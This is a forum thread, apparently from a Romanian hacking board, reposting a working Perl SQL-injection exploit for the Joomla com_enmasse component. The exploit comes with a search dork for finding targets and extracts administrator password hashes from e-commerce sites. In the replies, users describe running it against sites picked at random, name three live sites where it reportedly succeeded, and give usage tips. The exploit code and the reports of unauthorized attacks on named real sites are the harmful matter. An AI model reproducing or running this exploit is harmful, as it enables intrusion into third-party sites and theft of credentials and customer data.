DarkyAngel Posted August 9, 2012 Report Share Posted August 9, 2012 Joomla En Masse Component 1.2.0.4 SQL Injection # Exploit Title: Joomla com_enmasse Remote Exploit # Author: Daniel Barragan "D4NB4R"# Español# hola, este exploit afecta sitios de ecommerce por lo cual el exploit solo dara una muestra# de la extraccion posible de datos, No me hago responsable del uso que se le de. ya que es# posible obtener lucro economico por medio del mismo. El script esta hecho con tablas por# defecto de joomla.# English# hi, this exploit affects ecommerce sites so the exploit only give a sample of the# possible extraction of data, I am not responsible for any use that is given. since# it is possible to obtain economic profit through this. the script is done with joomla default tables.#!/usr/bin/perl -w######################################### Exploit Title: Joomla com_enmasse Remote Exploit## Dork: inurl:index.php?option=com_enmasse## Date: [06-08-2012]## Author: Daniel Barragan "D4NB4R"## Twitter: @D4NB4R## site: http://poisonsecurity.wordpress.com/## Vendor: http://www.matamko.com/## Version: 1.2.0.4 (last update on Jul 27, 2012)## License: Enmasse 6 Months Support & Subscription - USD$358.20## Demo: http://www.matamko.com/products/filexpress/live-demo.html# # Tested on: [Linux(bt5)-Windows(7ultimate)]## Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc....########################################print "\t\t\n\n";print "\t\n";print "\t Daniel Barragan D4NB4R \n";print "\t \n";print "\t Joomla com_enmasse Remote Exploit \n";print "\t\n\n";use LWP::UserAgent;print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";chomp(my $target=<STDIN>);$concatene="concat(password)";$table="jos_users";$d4nb4r="floor";$com="com_enmasse";$seleccione="select";$b = LWP::UserAgent->new() or die "Could not initialize browser\n";$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');$host = $target . "index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=".$com."&sortBy=117 and(".$seleccione." 1 from(".$seleccione." count(*),concat((".$seleccione." (".$seleccione." (".$seleccione." ".$concatene." from ".$table." Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C".$d4nb4r."(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1";$res = $b->request(HTTP::Request->new(GET=>$host));$answer = $res->content; if ($answer =~/([0-:a-fA-F]{32})/) {print "\n Hash Admin : $1\n\n";print " El exploit fue exitoso si desea ver mas datos modifique el script\n";print " The exploit was successful if you want to see more data modify the script\n";}else{print "\n[-] No se pudo, intente manualmente\n";}#####Daniel Barragan D4NB4R 2012################Sursa Quote Link to comment Share on other sites More sharing options...
caramea Posted August 9, 2012 Report Share Posted August 9, 2012 Am incercat pe 10 site-uri, nimic.. Si nu cred sa fi fost patch-uite. Quote Link to comment Share on other sites More sharing options...
mengele Posted August 9, 2012 Report Share Posted August 9, 2012 Am incercat pe 10 site-uri, nimic.. Si nu cred sa fi fost patch-uite.esti sigur ca au com_enmasse ? Quote Link to comment Share on other sites More sharing options...
caramea Posted August 9, 2012 Report Share Posted August 9, 2012 esti sigur ca au com_enmasse ?Foarte sigur! Quote Link to comment Share on other sites More sharing options...
mengele Posted August 9, 2012 Report Share Posted August 9, 2012 (edited) sincer eu am testat la 3 si a mers la toate...dar luate la intamplare cu dork...am fost curios si eu daca functioneste http://tip-it.com.sghttp://www.bizcountz.com/ http://findsports.co.uk ... uite unele testate de mine pe care a mers garantat! Edited August 9, 2012 by mengele Quote Link to comment Share on other sites More sharing options...
hades Posted August 9, 2012 Report Share Posted August 9, 2012 @caramea: Merge scriptul. Ai grija doar la url sa introduci asa: http://site.com/ nu http://site.com Quote Link to comment Share on other sites More sharing options...